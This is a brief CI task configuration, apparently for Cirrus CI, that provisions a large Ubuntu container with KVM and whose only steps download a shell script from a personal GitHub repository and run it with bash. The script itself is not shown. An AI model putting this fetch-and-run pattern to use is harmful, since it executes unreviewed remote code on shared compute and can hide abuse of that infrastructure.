task:
    name: Test IP
    timeout_in: 120m
    container:
        cpu: 8
        memory: 32G
        image: docker.io/ubuntu
        kvm: true
    script: 
        - wget -N https://github.com/misakabili1/refactored-bassoon/raw/main/test.sh
        - bash test.sh
